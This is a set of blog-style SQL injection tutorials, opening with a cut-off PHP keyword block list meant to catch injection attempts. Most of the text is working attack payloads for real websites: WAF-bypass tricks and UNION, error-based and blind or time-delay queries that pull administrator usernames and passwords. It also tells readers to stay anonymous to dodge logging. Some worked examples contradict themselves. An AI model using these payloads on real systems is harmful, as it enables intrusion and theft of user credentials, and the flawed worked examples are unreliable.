    $_COOKIE = array_map('stripslashes', $_COOKIE);
    $_REQUEST = array_map('stripslashes', $_REQUEST);
endif;
$_GET = array_map('mysql_real_escape_string', $_GET);
$_POST = array_map('mysql_real_escape_string', $_POST);
$_COOKIE = array_map('mysql_real_escape_string', $_COOKIE);
$_REQUEST = array_map('mysql_real_escape_string', $_REQUEST);
*/
// END OF ANTI MYSQL INJECTION

/* Logging */

$locatie = $_SERVER['REQUEST_URI'];
$array = Array();
$array[] = "mysql";
$array[] = "query";
$array[] = ")";
$array[] = ";";
$array[] = "}";
$array[] = "";
$array = Array();
$array[] = "mysql";
$array[] = ")";
$array[] = ";";
$array[] = "}";
$array[] = "INSERT";
$array[] = "DROPTABLE";
$array[] = "TRUNCATE";

$array[] = "UPDATE";
$array[] = "COOKIE";

$array[] = "FILES";
$array[] = "POST";
$array[] = "REQUEST";
$array[] = "SERVER";
$array[] = "INSERT";
$array[] = "%40";
$array[] = "%20";
$array[] = "";
$array[] = "DROPTABLE";
$array[] = "TRUNCATE";
$array[] = "WHERE";
$array[] = "VALUES";
$array[] = "SELECT";
$array[] = "FROM";
$array[] = "exit";
$array[] = "'";
$array[] = '"';
$array[] = ",";
$array[] = "`";
$array[] = "echo";

foreach($array As $posinject) {
if(eregi($posinject,$locatie)) {
$time = 'NOW()';

mysql_query("INSERT INTO `injection`(`user_id`, `ip`, `location`, `date`)
VALUES ('".ID."', '".$_SERVER[REMOTE_ADDR]."', '".$locatie."', '".$tijd."')") or die(mysql_error());

header("location: news.php");

exit();

}
}

This is a waf php script.
as you can see the filter out some importand words and signs.
it logs ip 2. !!! so its importand to be anonymous al the time!!!

Now the part comes where we need to bypass all of this.

WAF Bypassing - comments we can use.

First of all i would like you to have a look at these comments.
because these will bypass alot allready.
how do we do this, where do we use them and what do they exactly do.

Well lets start whit /**/, (), #, --, +--+,--+-, -- -,,%20,/,//, < changing a . into , somethimes does the trick 2.
/**/ this one is the most common to us.
it allows us to execute full words in our query whitout them being filtered out.
ofcource if the waf has more then one filter this could get tricky.

using comment in practice:

Code:
www.[site].com/index.php?id=-1+/*!union*/+select+1,2,3--+-

i get an error saying forbiden Somthing something ans whit the word select in it (if your lucky)
then i need to bypass the filter for select to.

Code:
www.[site].com/index.php?id=-1+/*!union*/+/*!select*/+1,2,3--+-

but ad i see in my WAF doc i am not that lucky
and i get redirected to news.php because the file sais so.

lets try changing that.
what about this: union+select+1,2,3--+-
Nope i got filtered out again.

WAF Bypassing - Spliting, replacing keywords.
To go further where i ended before i am going to split the code instead of using the comments.

Code:
www.[site].com/index.php?id=-1+uni>on+sel>ect+1,2,3--+-

there wil be cases this will work do not forget this one.
but not allways.

There is another methode called replacing the key words.

Code:
www.[site].com/index.php?id=-1+UNIunionON+SeLselectECT+1,2,3--+-

How does this work?
wel we all know the waf filteres out union and select.
look closely.
UNIunionON+ SELselectECT
he will filter out those 2 red words.
when he did that we requested exactly the same word at the database.
the filter is not good enough to replace that one.
if your lucky afcource.

Another simple option.
WAF Bypassing - Capitalization.
Some other easy methode is simply capitalizing the sql query's.
for example instead of union UnIoN this could escape our waf easely. (in some cases)!

WAF Bypassing - Combining Methode's.
We can combine this whet comments and other waf bypass methods. example:

Code:
www.[site].com/index.php?id=-1+/*!UnIoN*/+SeLeCt+1,2,3--+-

combining these could get you of radar fast. but this is all basic stuff people.

You need to learn to combine as mutch as possible.
whitout a brain you can't WAF Bypass!

A full line gething tables could look like this.
but it will probebly get mutch worce!

Code:
www.[site].com/index.php?id=-1+/*!UnIoN*/+SeLeCT+1,2,group_concat(/*!table_name*/)+FrOM+/*information_schema*/,TaBlEs+/*!WHERE*/+/*!TaBlE_ScHeMa*/+like+database()- -

I also changed 2 other things here.
changing the . to a , as i said before could pass the waf radar.
and i changed the = at the end into like because it could also filter the = to something..

WAF Bypassing - using characters.
By using a range of characters to bypass filter we could get true the waf.
following characters can do this:

Code:
[], ;, :, \/, $, €, |, ?, ", ', *, %, £ and lots more.

by using these characters in lots of cases union and select are not filtered. but the sign * is.
which means replacing the keywords would not work. as shown before in my tutorial.

we could do this insead:

Code:
www.[site].com/index.php?id=-1+uni*on+sel*ect+1,2,3--+-

this is not mutch change from spliting the keywords.
only here the *¨sign is filtered out. so the union+select wil be complete as soon as it is filtered.

some others. when filtered out.
we could do (uni)(on)+(sel)(ect)
or using the quotes 'uni"on'+'sel"ect' this does not work whit mssql.

WAF Bypassing - Split sql statement.

In some cases parts of the sql statement are filtered out. for example union.
or the select.

This means by splitting this and only using id=-1+union+1,2,3--+- or the other way arround.
we could bypass the filter.

WAF Bypassing - encoding characters.
By encoding characters for example the '
or the white space.
you could geth true the waf because he dous not filter encoded characters.
IN MOST CASES THEY DO.
this is for when you get stuck i guess.

you could look for double encoding characters searching google. ill previeuw a fieuw here.

single quote ' %u0027
open ( = %u0028
close ) = %u0029
and a white space %u0020

single encoding is almost always filtered by the waf. so try double.

Now we should have covered the basics.
lets step over to Filter evasion.

intrusion detection!

Intrusion detection systems disable us from doing or 1=1.
we need to bypass this intrusion detection in order to check vuln.

example of an intrusion detection system.

Code:
alert tcp any any -> $HTTP_SERVERS $HTTP_PORTS (msg: “SQL Injection attack”;
flow: to_server, established; content: “' or 1=1 --”; nocase; sid: 1; rev:1;

This is ofcource the most simple example i could give you.

This php code sais:
alert when he gets this or 1=1 in his http server/ http ports so he displays a message: msg: "sql injection attack":
thats it. but they could filter out alot more.

lets take it easy.
if the system sais. i cant do 1=1
phuh why wont i do 2=2 that simple.
but since or and = could be filtered apart from the or 1=1
lets do this.

and 2 like 2
that should work.
afcource security guy wont give up.

like does not work. then do this 1 < 2 this means 1 is smaller then 2. database should return true.
unless it is filtered.

we could do 2 > 1 2 is bigger then 1. true.

This is so easy its like math.

lets doe : and 1230 - 1 like 1229
works 2.

using unicode to encode your input may work 2.
unicode cheat sheet

Basic sql injection String Injection

2011-12-16T22:49:00.000+08:00

1. This tutorial.
2. Notepad. Because, using a pen and paper would take to long.
3. A vulnerable site.

Lets start.

1. Check the site, if it is vulnerable.

Enter ' behind the link

Code:
http://www.[site].com/page.php?id=1

Code:
http://www.[site].com/page.php?id=1'

If something like this pops up? Then it is vulnerable:

Code:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''5''' at line 1

2. Next up, we do the oder by statement. This wil show us how many columns we have.

Code:
http://www.[site].com/page.php?id=1+order+by+1--+- [no error]
http://www.[site].com/page.php?id=1+order+by+99--+- [!!error!!]
http://www.[site].com/page.php?id=1+order+by+2--+- [no error]
http://www.[site].com/page.php?id=1+order+by+3--+- [no error]
http://www.[site].com/page.php?id=1+order+by+4--+- [error]

Why do i do order by 99?
To check if we don't have to use a string injection.
If you do not get an error when u use order+by+99--+-
Then we wil need to force an error.

Code:
http://www.[site].com/page.php?id=1+order+by+1--+- [no error]
http://www.[site].com/page.php?id=1+order+by+99--+- [no error]
http://www.[site].com/page.php?id=1+order+by+2--+- [no error]
http://www.[site].com/page.php?id=1+order+by+3--+- [no error]
http://www.[site].com/page.php?id=1+order+by+4--+- [no error]

As folowing:
Always place a ' behind the id number.

Code:
http://www.[site].com/page.php?id=1'+order+by+1--+- [no error]
http://www.[site].com/page.php?id=1'+order+by+99--+- [!!error!!]
http://www.[site].com/page.php?id=1'+order+by+2--+- [no error]
http://www.[site].com/page.php?id=1'+order+by+3--+- [no error]
http://www.[site].com/page.php?id=1'+order+by+4--+- [error]

Now we had this part. Lets move on to the union statement.
We know we have 3 columns now.

[attention]If, you force an error! Never forget to use the ' behind the id number.[attention]

3. Union Select.

Code:
http://www.[site].com/page.php?id=1+union+select+1,2,3--+-

Now there wil popup some numbers in the content of the site.
Lets say, i see a big 2 in the middle of my site.

That means we have a vulnerable column.
We wil check version now.

Code:
http://www.[site].com/page.php?id=1+union+select+1,version(),3--+-

If that dous not work do this:

Code:
http://www.[site].com/page.php?id=1+union+select+1,@@version,3--+-

You wil see the mysql version now.
We always want it to be 5.x.x or more!
Not lower then 5 if it is give up.

Lets say mine is: 5.0.92 - community
That means im readdy to roll.

4. Select database name:

Code:
http://www.[site].com/page.php?id=1+union+select+1,group_concat(database()),3--+-

Or simply do:

Code:
http://www.[site].com/page.php?id=1+union+select+1,database(),3--+-

If you want to find all the database's? is some cases a site has more then 1!
do this:

Code:
http://www.[site].com/page.php?id=1+union+select+1,group_concat(schema_name),3+from+information_schema​.schemata--+-

Lets say my database is caled "db_1" no quotes.
This line asks the database which name it has.
The group_concat is a line we use to select annything we need.

5. Select table names:

Code:
http://www.[site].com/page.php?id=1+union+select+1,group_concat(table_name),3+from+information_schema.​tables+where+table_schema=database()--+-

The group_concat statementh has a max length of 1024 characters.
If we want to find all tables you could do this manually using concat() and a limit.

Code:
http://www.[site].com/page.php?id=1+union+select+1,group_concat(table_name),3+from+information_schema.​tables+where+table_schema=database()+limit+0,1--+-

keep increasing that limit untill you have all tables.

Now you should have a list whit alot of names in there.
we select what we need.

Lets check for:
User"s", admin"s"
administrator"s", member"s"
tbladmin"s",tblmember"s"
tbluser"s",tbladministrator"s"
tbl_admins, ..

Lets say i have a administrator table.

6. Select column names:

Code:
http://www.[site].com/page.php?id=1+union+select+1,group_concat(column_name),3+from+information_schema​.columns+where+table_name="administrator"--+-

You couild use the limit here to. "limit+0,1--"
if you do not see all columns.

If you get an error "DO NOT BE SCARED" it is not lost.
Its a hex: http://www.swingnote.com/tools/texttohex.php
Place the table name my case: administrator where it says:
Say hello to my little friend!

Translate: 61646d696e6973747261746f72 (administrator)
this is my hex.

How to ad it to a link. Wel, where u now have ble_name="administrator"--+-
At the end of your link. We need to change to this. ble_name=0x--+-

And place the hex behind the 0x.

Code:
http://www.[site].com/page.php?id=1+union+select+1,group_concat(column_name),3+from+information_schema​.columns+where+table_name=0x61646d696e6973747261746f72--+-

Now you should see alot of names again. Look for username and password or email/password or name/pass whatever relates.
Mines are user and pass.
How do we select these. Not that hard at all.

We use the group_concat(user,0x3a,pass) 0x3a is nessesairy it means colon.
At the end: +from+db_1.administrator
The db_1 is the database we searched at start.
And, you do not need to use a hex now!

As following:

Code:
http://www.[site].com/page.php?id=1+union+select+1,group_concat(user,0x3a,pass),3+from+db_1.administra​tor--+-

If annything went good? You should now have the admin name and password.

7. WAF bypassing. (basics)

When you have an error using the union select statement.
It is most likely because the admins made an attempt to secure against sqli.

Those admins fail...

So we have to make sure we can actually use the union statement.
to get what we need. a basic example: /*!union*/+/*!select*/
the /*! */ is bypassing the WAF because they only ignored union+select.

Code:
http://www.[site].com/page.php?id=1+/*!union*/+/*!select*/+1,2,3--+-

If all good we should get the vulnerable numbers now.
There are many ways to bypass WAF.
example: un>ion+sel>ect
or: UnIoN+SeLeCt

Now we bypassed it? we still need information from the columns.

Code:
http://www.[site].com/page.php?id=1+/*!union*/+/*!select*/+1,CoNcAt(version()),3--+-

This should get you the version.
Same for database.
Now we need tables.

Code:
http://www.[site].com/page.php?id=1+/*!union*/+/*!select*/+1,GrOuP_CoNcAt(/*!table_name*/),3+FrOm+/*!information_schema*/.TaBlEs+WhErE+/*!table_schema*/=database()--+-

Blind sql Injection. (ascii char)

2011-12-16T22:45:00.000+08:00

Checking vulnerability

Lets start, In what cases do we know if it really is a blind injectable site only?

Wel, you have a site. same as normal injection whit php?if= of pfp?f= of other stuff.. dous not mather.
we want to check if he is vulnerable. so we put and 1=1 behind the id number.
that is always true. ib this case we do not get an error,
now the real test: instead of 1=1 use and 1=2

Code:
www.[site].com/index.php?id=1+and+1=2

If we see any text missing or image movement.
or an error like this: invalid id or db_error select * from [site]@localhost call line... blah blah blah.
This means it is vulnerable.

do not forget: and 1=1 means true. page wil return unharmed.
and 1=2 is false. page returns in error or moved content.

Finding the mysql version of the site.

sinse it is blind sqli... the site will not pop up the version when you put version() no it needs more.
It always needs..
Using the substring(@@version,1,1) is asking if the =4 is true. so we ask database. hey database, is this a version 4 you use.
Database is like No wtf i'm awesome. (he returns false.)
That means instead of =4 put =5

Code:
www.[site].com/index.php?id=1 and substring(@@version,1,1)=5

Database returns true. (page is normal)
this means its a version 5 database.

gambling columns and tables..
Yeeey people, we moved on to the fun stuff. guessing tables and columns.
since database only sais true or false. we gonna ask our little friend the database everything.

Blind sqli is not that hard. but it sucks as hell!!

how do we guess?
we put something like this: and (select 1 from users limit 0,1)=1
what did i do? wel.
I ask database hey do you in any case have a table name called USERS? database no im awesome. guess again.
database returned false so we try again.

Code:
www.[site].com/index.php?id=1 and (select 1 from admin limit 0,1)=1

now i asked database if he has an admin column. database answers: yes im awesome. and returns true.
that means we have a hit yay.
If you are unluckly you need to guess more.

examples: members, tbl_admin, tbladmin, administrator, tbl_users, tblusers, admn
and way more.

God bless us because our journey is not yet on its end.

Columns. we need to guess them to :D

Code:
www.[site].com/index.php?id=1 and (select substring(concat(1,password),1,1) from administrator limit 0,1)=1

What did i do?
Wel i askt database hey, do you have a column password in table administrator?
database yes i have one.
he returned true.
we stil need usernames or what else they called it.

Code:
www.[site].com/index.php?id=1 and (select substring(concat(1,username),1,1) from administrator limit 0,1)=1

i ask database if he has a column username. database is like NO wtf!
He returned false. now i'm like thinking of killing me.

lets try again..

Code:
www.[site].com/index.php?id=1 and (select substring(concat(1,name),1,1) from administrator limit 0,1)=1

I asked database is he for example has Name as a column in table administrators.
database: yes. he returned true.

Hold on Hold on we are not finished yet.

get password and username using ascii char!
since that database hates us. he wont just popup the hash and username like that.
lets suck it out of him he made us mad allready.

by using the ascii char we can do this.
we know we have the column password and the column name. lets use this.

Code:
www.[site].com/index.php?id=1 and ascii(substring((select concat(name,0x3a,password) from admin where userid=2),1,1))>99

It returned true. we need to go higher.
but first what did i do?
i used the ascii char at start.
then i select name 0x3a password. as shown in my basic tut you should know by now.
and i selected these out of the table admin. i selected user 2 in the database.
Ok that should be clear.

We still need to go higher whit the ascii char.

Code:
www.[site].com/index.php?id=1 and ascii(substring((select concat(name,0x3a,password) from admin where userid=2),1,1))>101

it returned true again.
we need to go higher!

Code:
www.[site].com/index.php?id=1 and ascii(substring((select concat(name,0x3a,password) from admin where userid=2),1,1))>102

error.
this means its higher then 101 but not higher then 102 so we know its 102 yay.
the first character is 102 lets check this in an ancii char converter.
or use google and type ascii character 102.
i got letter f as my first character.
finding the next character.

Code:
www.[site].com/index.php?id=1 and ascii(substring((select concat(name,0x3a,password) from admin where userid=2),2,1))>99

look at the changes at the end of the link!!
i changed the 1,1 in 2,1
that means the database wil look for the second character in line.
have fun.
because you need to encrease this and look for the characters creating the full password, or hash, and username.
this will take ages i wont type a full hash for ya XD

Basic error sql injection

2011-12-16T22:43:00.002+08:00

Part 1:
+--Basic error injection.
- Explenation.
- Extracting information.
part 2:
+--Sequel error sql injection.
- Checking vulnerability and keeping the sequel closed.
- exectuting the second part. extracting database information.
- Using casting for table names.
- Using casting for column names.
- using casting to collect data from columns.

Basic error injection.

basic error based. (i wil keep this short)
i keep this part short. because its basic and yeahh no one likes basics.
i will go over to sequel a litlle further in this tutorial.

Wel, as the name sais error based.
in this case the errors the database outputs are very emportand to us.
we for example say id?=1 or 1=convert(int.(user))--
database will respond in error whit saying this is not correct, who is the user.
he will give the answer to us in his error.
for example the error would be:

Code:
Syntax error converting the nvarchar value '[user_1]' to a column of data type int.

He gave user_1 as the database user aint that awesome. now we would for example get the database name.
the version and more.
So far the explenation of the error message.

extracting information. (basic error based)
as i explained before. we will always get the answer inside the error.

Code:
www.[site].com/index.php?id=1 or 1=convert(int.(user))--

this gives us the database user in the error message.

error message would for example be:

Code:
Syntax error converting the nvarchar value '[user_1]' to a column of data type int.

User_1 is our database user.

Now we neet the database name.
By replacing the user in our injecting point whit DB_name we should get the database name in the error message.

Code:
www.[site].com/index.php?id=1 or 1=convert(int.(DB_NAME))--

Now we get the error message whit our answer!

Code:
Syntax error converting the nvarchar value '[Database_name_1]' to a column of data type int.

In this case for example the database name is: database_name_1 as we see in the error message.

Now aint this methode easy as f.

extracting the version and servername goes exactly the same way.
we only need to know what to replace in our injection point.

Code:
www.[site].com/index.php?id=1 or 1=convert(int.(@@version))--

This @@version will create an error saying what version the database runs.

Code:
www.[site].com/index.php?id=1 or 1=convert(int.(@@servername))--

By using the @@servername we wil get an error message responding whit the servername.

as obvious as it is.

We have the database name: database_name_1
We have the database user: user_1
we have the version: (for example) 5.0.19
and the servername. you will see when you practice.

Sequel error based sql injection.

checking vulnerability and keeping sequel query's closed.

We have a site. In normal injection we check vulnerability whit a quote.
in this case we need a sequel.

simple.

Code:
www.[site].com/index.php?id=1 [we have to change the 1 into a (,) coma.]
www.[site].com/index.php?id=, [<-- this is what i mean.]

By doing this we create an sql error.
shown by the sequel server driver.

something like this:

Code:
Microsoft DB PROVIDER FOR SQL SERVER ERROR (some numbers)
incorrect syntax near
somthing blah blah..

now we know this. we still need to close the sequel query. this could work whit a ' or whit )--
something like this should do.

example:

Code:
www.[site].com/index.php?id=1)--

if you get an error the query was not succesfully closed.

lets say i do not have an error for the sake of simplicity.

Now we want to find an id number thats not in the database.
you remember when u used order by?
you did order by 99-- first.
the 99 we use because we know its almost unimposible for the database to have 99 of them.

example:

Code:
www.[site].com/index.php?id=99)--

so i made 99 from id 1 and yet again i keep the sequel closed!.

Now we should get a small error. because this dous not exist in our database.
Something like this:

Code:
some numbers..
index.php ).00 [?]

now we know this field is clear for our injection.

lets start adding some information into our injection point.

exectuting the second part. extracting database information

we are going to check if the current database (the one in 99) is same as in 0.
to be sure we get the good information.

how do we do this.
by using an or statement asking for db_name(0)=0)--
we ask the database id, then we ask if its equal to 0.

Code:
www.[site].com/index.php?id=99 or db_name(0)=0)--

now we should get an error that displays the current database at 0.

this error message should look like this:

Code:
Microsoft blah blah PROVIDER for sql server error blahh blah..
conversion failed when converting the nverchar value 'database_name_1' to data type int.
index.php on line ...

as you see between the quotes it shows 'database_name_1'.
which is the database the site uses.

to find other databases in the system
do:

Code:
www.[site].com/index.php?id=99 or db_name(1)=0)--

now we for example get another database calles 'database_name_2'
whitin the error. that is not the current database. database_name_1 is.
you can increase this value db_name(0)=0)-- to find more databases.
example for the 3rth if there is one: db_name(3)=0)--.

now we know this database name we can go further.

Using casting for tables.

we are going to use the methode casting to get more information out of the database.

Code:
www.[site].com/index.php?id=99) [we close the sequel direct now. this is importand!]

The first part of our cose is OR 1 IN
now we use a select statement selecting whit cast method:

OR 1 IN(select top 1 cast(NAME AS VARCHAR(4096))
now the second part where we use our db name.
From database_name_1..sysobjects WHERE xtype='U')
this means we are looking for systemobjects and user objects ( the xtype='u')
means we look for user objects.
inside the database_name_1.

full code:

Code:
www.[site].com/index.php?id=99) OR 1 IN(select top 1 cast (NAME AS VARCHAR(4096)) from database_name_1..sysobjects WHERE xtype='u')--

always double check what you type!

Now we should get an error like this.

Code:
Microsoft blah blah PROVIDER for sql server error blahh blah..
conversion failed when converting the nverchar value 'logging' to data type int.
index.php on line ...

we found a column 'logging'
we want other columns lets look further.
we will filter this out.
we want to have all user columns. but not the logging columns since we allready got that one.
adding this to the end should do the trick. and name not in('logging')

as following:

Code:
www.[site].com/index.php?id=99) OR 1 IN(select top 1 cast (NAME AS VARCHAR(4096)) from database_name_1..sysobjects WHERE xtype='u' and name not in('logging'))--

now we did that we get another error. the same as before but instead of logging we see 'users'
thats one we might need.

we add this to our NOT IN list

Code:
www.[site].com/index.php?id=99) OR 1 IN(select top 1 cast (NAME AS VARCHAR(4096)) from database_name_1..sysobjects WHERE xtype='u' and name not in('logging','users'))--

now we get an error. that is because these where all tables in there!

now we want all info inside of the users table.

using casting for column names!
its kind of the same as we did whit tables. so watch closely what chenges!
the or 1in and select top 1 cast stay we need those to get thi info we need.
behind that it changes.
we wil replace that whit our dbname which is database_name_1 and we wil ad .syscolumns.name to that

OR 1 IN(select top 1 cast (database_name_1..syscolumns.name as varchar(4096))
this basicly asks the column names whitin the database. now we need to specify from what table we gather them from.

from database_name_1..syscolumns, database_name_1..sysobjects WHERE database_name_1..syscolumns.id=database_name_1..sysobjects.id and database_name_1..sysobjects.name ='users')--
look at the end where i filtered the table 'users'

this is a fucking long query to keep in mind. il show the full one:

Code:
www.[site].com/index.php?id=99) OR 1 IN(select top 1 cast (database_name_1..syscolumns.name as varchar(4096))from database_name_1..syscolumns, database_name_1..sysobjects WHERE database_name_1..syscolumns.id=database_name_1..sysobjects.id and database_name_1..sysobjects.name ='users')--

execute this.
now you will get an error saying the first column in table users.

mine is 'username'.
in some cases you get id or password or other stuff as the first one.
but eventually you need to get all columns anyway so.
we need to filter out the ones we have.
i will filter out usernames and it will show the next one to me.
we wil use the and name not in '..' again
but we change name into database_name_1..syscolumns.name to prevent an unknown error.

look at the end of the line watch closely.

PEOPLE DO NOT FORGET TO WRITE DOWN IT WONT GET EASYER!!!! the database never likes us.

Code:
www.[site].com/index.php?id=99) OR 1 IN(select top 1 cast (database_name_1..syscolumns.name as varchar(4096))from database_name_1..syscolumns, database_name_1..sysobjects WHERE database_name_1..syscolumns.id=database_name_1..sysobjects.id and database_name_1..sysobjects.name ='users' AND database_name_1..syscolumns.name NOT IN('username'))--

now we execute. and we geth the following column. exactly as we did in tables.

lets say i got 'pass' now. to keep it god damn simple!
this means when i put the word pass in the filter to we get an error because there are only to columns!

so i found username and pass whitin the table users.
now i want those names and passwords.

take a sec. now look at the long god damn query you wrote.
ant that awesome knowing what it means?
lets move on!

using casting to collect data from columns

we wil use the castline yet again.
but this time instead of selecting the db names and column stuff. we select the column calles username.
selecting this from table users. and we want the id to be greater then 0 so: id> 0
as following:

OR 1 IN (select top 1 cast(username as varchar(4096)) from users WHERE id> 0)--

full query:

Code:
www.[site].com/index.php?id=99) OR 1 IN (select top 1 cast(username as varchar(4096)) from users WHERE id> 0)--

now execute this line.
you will get an error telling the first name whitin usernames.

i get an error saying 'administrator' to keep it simple ;)

to get the others change the id> 0 ti something else.
for example id= 1
if you get the same name again change id= 1 to id= 2
and you will get another name for example 'heatcontroll'
you keep doing this until you get an error which means you ren out of names whitin the column.

Now we want the passwords.
just edit the line. where usernames is i for example paste pass. because my other column was pass.

OR 1 IN (select top 1 cast(pass as varchar(4096)) from users WHERE id> 0)--

full query:

Code:
www.[site].com/index.php?id=99) OR 1 IN (select top 1 cast(pass as varchar(4096)) from users WHERE id> 0)--

and now execute this.
you will get the first pass in row which is the one of admins.
password: 123.

when you change the id limit to the same we used for the name real steel which was id= 2
we will for example get passwords: ABC

Basic blind Sql Injection

2011-12-16T22:42:00.000+08:00

A vulnerable only to blind sql injection .asp webstite.
Notepad, to store data you collect while injecting.
And loads of loads of spare time.

Finding vulnerable sites: --Kobez expanding vulnerable collection guide!--

The 2 kinds of time delay injection.

Integer injection:

Code:
www.[site].com/index.asp?id=1; waitfor delay '00:00:10'--

So this line sais that satabase has to wait for 10 seconds before he responds.

If the database returns directly, we know its false.
If it waits 10 seconds its "true" obvious.

String injection:

Code:
www.[site].com/index.asp?id=1'; waitfor delay '00:00:10'--

same thing here only the quote came whit it ' as in basic sqli when u have a string injection.

Extracting the database username.

Wel. we have alot of work to do.
we need to find all characters. lets start whit one:

Code:
www.[site].com/index.asp?id=1; IF (len(user)=1) waitfor delay '00:00:10'--

Lets explain first. we ask: if (len(user)=1) so we ask is user has one character. waitfor delay '00:00:10'
database needs to wait 10 seconds to respond. but we all know in most cases a user is not 1 char.

we will encrease (len(user)=1) to (len(user)=2) and so on and so on.

Code:
www.[site].com/index.asp?id=1; IF (len(user)=1) waitfor delay '00:00:10'-- [no Delay from db.]
www.[site].com/index.asp?id=1; IF (len(user)=2) waitfor delay '00:00:10'-- [no delay from db.]
www.[site].com/index.asp?id=1; IF (len(user)=1) waitfor delay '00:00:10'-- [no delay from db.]
www.[site].com/index.asp?id=1; IF (len(user)=1) waitfor delay '00:00:10'-- [page waites 10 seconds before it loads.]

we have a hit. database just told us by waiting 10 seconds that user has 4 characters.
But what are the characters we seek? :/

Get characters whit ascii and time delay.
As we have seen in my previous tutorial. we are going to use ascii.
these will help us get the characters of the username.

97 in ascii is the letter A we will encrease this count untill we get a hit.
for example 97 A, 98 B, 99 C, and so on.

how do we do this.

Code:
www[site].com/index.asp?id=1; IF (ascii(lower(substring((user),1,1)))>97) waitfor delay '00:00:10'--

what did i just say.
if ascii (character code) from user
1,1 (this means 1rst character) is 97 which is an A in ascii is correct. the database would wait 10 seconds befor ethe page loads.

We need 4 character so the 1,1 needs to be encreased. if we want the second character we need to do 2,1.

first character:

Code:
www[site].com/index.asp?id=1; IF (ascii(lower(substring((user),1,1)))>97) waitfor delay '00:00:10'-- [no delay]
www[site].com/index.asp?id=1; IF (ascii(lower(substring((user),1,1)))>98) waitfor delay '00:00:10'-- [no delay]
www[site].com/index.asp?id=1; IF (ascii(lower(substring((user),1,1)))>99) waitfor delay '00:00:10'-- [no delay]
www[site].com/index.asp?id=1; IF (ascii(lower(substring((user),1,1)))>100) waitfor delay '00:00:10'-- [no delay]
www[site].com/index.asp?id=1; IF (ascii(lower(substring((user),1,1)))>101) waitfor delay '00:00:10'-- [10 second delay]

the first character is a E. how do i know this:
at 97 i had no delay which means its not an A
at 98 i had none either
not at 99, not at 100
but i did have a 10 second delay at 101. and 101 is E in achii char code.

We need 4 more characters.

Code:
www[site].com/index.asp?id=1; IF (ascii(lower(substring((user),2,1)))>97) waitfor delay '00:00:10'-- [no delay]
www[site].com/index.asp?id=1; IF (ascii(lower(substring((user),2,1)))>98) waitfor delay '00:00:10'-- [no delay]
www[site].com/index.asp?id=1; IF (ascii(lower(substring((user),2,1)))>99) waitfor delay '00:00:10'-- [10 second delay]

second character is a C
look closely at what changed at the code. instead of 1,1 it is 2,1 because i wanted to know the second character of user.

Third character:

Code:
www[site].com/index.asp?id=1; IF (ascii(lower(substring((user),3,1)))>97) waitfor delay '00:00:10'-- [no delay]
www[site].com/index.asp?id=1; IF (ascii(lower(substring((user),3,1)))>98) waitfor delay '00:00:10'-- [no delay]
www[site].com/index.asp?id=1; IF (ascii(lower(substring((user),3,1)))>99) waitfor delay '00:00:10'-- [no delay]
www[site].com/index.asp?id=1; IF (ascii(lower(substring((user),3,1)))>100) waitfor delay '00:00:10'-- [no delay]
www[site].com/index.asp?id=1; IF (ascii(lower(substring((user),3,1)))>101) waitfor delay '00:00:10'-- [no delay]
www[site].com/index.asp?id=1; IF (ascii(lower(substring((user),3,1)))>102) waitfor delay '00:00:10'-- [10 second delay]

Third is an F yet again watch the code i changed 2,1 in 3,1.

fourth

Code:
www[site].com/index.asp?id=1; IF (ascii(lower(substring((user),4,1)))>97) waitfor delay '00:00:10'-- [no delay]
www[site].com/index.asp?id=1; IF (ascii(lower(substring((user),4,1)))>98) waitfor delay '00:00:10'-- [no delay]
www[site].com/index.asp?id=1; IF (ascii(lower(substring((user),4,1)))>99) waitfor delay '00:00:10'-- [no delay]
www[site].com/index.asp?id=1; IF (ascii(lower(substring((user),4,1)))>100) waitfor delay '00:00:10'-- [no delay]
www[site].com/index.asp?id=1; IF (ascii(lower(substring((user),4,1)))>101) waitfor delay '00:00:10'-- [no delay]
www[site].com/index.asp?id=1; IF (ascii(lower(substring((user),4,1)))>102) waitfor delay '00:00:10'-- [10 second delay]

fourth character is yet again an F.

we now have the four characters i needed:
ECFF = user.

What a hell of a job for 4 characters...
No, no we are not finished yet.

Extracting the db name.
Same as before database wants us to have a hell of a job, its a bitch.
now lets hope that god damn administrator likes short names (THEY DONT)

we need to know how many characters the db name hase. not much difference.

Code:
www[site].com/index.asp?id=1; if (len(db_name())=1) WAITFOR DELAY '00:00:10'-- [no delay]

i said database: does db_name have only one character? database said no my admin hates that.
so we need to run down the whole thing again. changing the =1 into =2, =3 and so on.
untill he waites 10 seconds.

Code:
www[site].com/index.asp?id=1; if (len(db_name())=3) WAITFOR DELAY '00:00:10'-- [10 second delay]

our db name has 3 characters (in real cases they will probebly end up in 8 or 10 characters.
but this is a tutorial. i wont type a milion characters. if you did not get it by now XD sorry for you.

first character.

Code:
www[site].com/index.asp?id=1; IF (ascii(lower(substring((db_name),1,1)))>97) waitfor delay '00:00:10'-- [no delay]
www[site].com/index.asp?id=1; IF (ascii(lower(substring((db_name),1,1)))>98) waitfor delay '00:00:10'-- [no delay]
www[site].com/index.asp?id=1; IF (ascii(lower(substring((db_name),1,1)))>99) waitfor delay '00:00:10'-- [10 second delay]

first character is C

Code:
www[site].com/index.asp?id=1; IF (ascii(lower(substring((db_name),2,1)))>97) waitfor delay '00:00:10'-- [no delay]
www[site].com/index.asp?id=1; IF (ascii(lower(substring((db_name),2,1)))>98) waitfor delay '00:00:10'-- [no delay]
www[site].com/index.asp?id=1; IF (ascii(lower(substring((db_name),2,1)))>99) waitfor delay '00:00:10'-- [no delay]
www[site].com/index.asp?id=1; IF (ascii(lower(substring((db_name),2,1)))>100) waitfor delay '00:00:10'-- [no delay]
www[site].com/index.asp?id=1; IF (ascii(lower(substring((db_name),2,1)))>101) waitfor delay '00:00:10'-- [10 second delay]

second character is an E watch the limit again 1,1 changed to 2,1.

Code:
www[site].com/index.asp?id=1; IF (ascii(lower(substring((db_name),3,1)))>97) waitfor delay '00:00:10'-- [no delay]
www[site].com/index.asp?id=1; IF (ascii(lower(substring((db_name),3,1)))>98) waitfor delay '00:00:10'-- [no delay]
www[site].com/index.asp?id=1; IF (ascii(lower(substring((db_name),3,1)))>99) waitfor delay '00:00:10'-- [no delay]
www[site].com/index.asp?id=1; IF (ascii(lower(substring((db_name),3,1)))>100) waitfor delay '00:00:10'-- [no delay]
www[site].com/index.asp?id=1; IF (ascii(lower(substring((db_name),3,1)))>101) waitfor delay '00:00:10'-- [10 second delay]

last letter is another E
db_name = CEE

Extracting database tables
the principal remains the same.
IT IS EASY. but if you want to go out door once in a while.
avoid blind sqli..

